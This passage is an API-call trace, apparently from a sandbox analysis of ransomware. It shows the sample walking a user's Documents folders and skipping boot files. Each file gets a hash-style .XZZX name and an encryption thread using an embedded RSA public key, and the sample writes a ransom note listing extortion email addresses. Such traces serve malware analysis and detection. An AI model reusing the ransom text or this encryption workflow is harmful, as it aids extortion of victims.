HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0106.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a4 [0106.148] Sleep (dwMilliseconds=0x96) [0106.304] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.304] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2="..") returned 1 [0106.304] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2=".") returned 1 [0106.304] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.304] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntldr") returned 0x0 [0106.304] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTLDR") returned 0x0 [0106.304] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.304] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.304] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0106.304] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0106.304] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0106.304] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.304] lstrcpyW (in: lpString1=0x17be7c, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0106.304] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0106.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a8 [0106.305] Sleep (dwMilliseconds=0x96) [0106.460] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.460] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.460] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.460] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0106.460] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0106.460] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0106.460] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0106.460] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0106.461] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0106.461] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0106.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0106.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0106.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0106.461] SetErrorMode (uMode=0x1) returned 0x1 [0106.461] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT") returned 82 [0106.461] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0106.461] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0106.461] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x3ac) returned 0x0 [0106.462] RegQueryValueExW (in: hKey=0x3ac, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4b90, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb4b90*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0106.462] RegCloseKey (hKey=0x3ac) returned 0x0 [0106.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0106.462] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0106.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0106.463] CloseHandle (hObject=0x3ac) returned 1 [0106.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0106.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0106.463] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0106.463] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0106.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.463] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2="..") returned 1 [0106.463] lstrcmpW (lpString1="IkpxUp8UshIgHl1", lpString2=".") returned 1 [0106.464] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0106.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0106.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0106.464] SetErrorMode (uMode=0x1) returned 0x1 [0106.464] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0106.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.464] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0106.464] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0106.465] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0106.465] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0106.465] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0106.465] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0106.465] lstrcmpW (lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX", lpString2="..") returned 1 [0106.465] lstrcmpW (lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX", lpString2=".") returned 1 [0106.465] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.465] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntldr") returned 0x0 [0106.465] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTLDR") returned 0x0 [0106.465] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.466] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0106.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0106.466] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0106.466] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.466] lstrcpyW (in: lpString1=0x17addc, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0106.466] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b4 [0106.466] Sleep (dwMilliseconds=0x96) [0106.616] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0106.616] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2="..") returned 1 [0106.616] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2=".") returned 1 [0106.616] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.616] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntldr") returned 0x0 [0106.616] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTLDR") returned 0x0 [0106.616] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.616] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0106.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0106.616] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0106.616] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.616] lstrcpyW (in: lpString1=0x17addc, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0106.616] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b8 [0106.616] Sleep (dwMilliseconds=0x96) [0106.772] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0106.772] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2="..") returned 1 [0106.772] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2=".") returned 1 [0106.772] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.772] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntldr") returned 0x0 [0106.772] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTLDR") returned 0x0 [0106.772] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.772] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.772] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0106.772] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0106.772] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0106.772] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.772] lstrcpyW (in: lpString1=0x17addc, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0106.772] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0106.773] Sleep (dwMilliseconds=0x96) [0106.928] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0106.928] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2="..") returned 1 [0106.928] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2=".") returned 1 [0106.928] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.928] StrStrW 